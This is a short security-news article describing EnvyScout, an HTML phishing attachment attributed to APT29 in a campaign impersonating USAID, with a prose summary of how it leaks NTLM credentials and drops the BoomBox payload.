EnvyScout is a new malware strain that was used in a phishing attack that impersonated the United States Agency for International Development (USAID). The threat actors responsible for the operation are from APT29, the same hacker collective that carried out the supply-chain attack against SolarWinds. APT29 is believed to have ties to Russia. Other names used to designate the same threat actor are Nobelium, SolarStorm, DarkHalo, NC2452 and StellarPartile.
The hackers managed to compromise a Contact account belonging to USAID and then proceeded to send over 3000 phishing emails to more than 150 different entities. The targets included organizations and government agencies involved with human rights and humanitarian work, as well as international development. Infosec researchers discovered four never-before-seen malware strains as part of the USAID attack - an HTML attachment named 'EnvyScout,' a downloader named 'BoomBox,' a loader called 'NativeZone,' and a shellcode named 'VaporRage.' The first threat to be dropped onto compromised machines is EnvyScout.
Microsoft analyzed the malware used in the USAID attack and released a report with their findings. EnvyScout is designed to drop the next-stage payload onto the infected system, while also capturing and exfiltrating certain data - mainly NTLM credentials of Windows accounts. The threat is an HTML/JS file attachment distributed under the name 'NV.html.' When executed, the NV file will try to load an image from a file:// URL. At the same time, the Windows NTLM credentials of the logged user may be sent to a remote server under the control of the hackers. The cybercriminals can then attempt to reach the plain text password contained in the data through brute-force methods.
EnvyScout will escalate the attack by converting an embedded text blob into a corrupted image file named 'NV.img' that will be saved on the local system. If the image file is initiated by the user, it will display a shortcut called NV that will execute a hidden file named 'BOOM.exe.' The hidden file is part of the next-stage payload for the BoomBox malware.
It should be noted that EnvyScout was observed to be deployed in a different phishing campaign. According to the infosec researcher Florian Roth, the threat was attached to phishing emails posing as official correspondence coming from the Embassy of Belgium.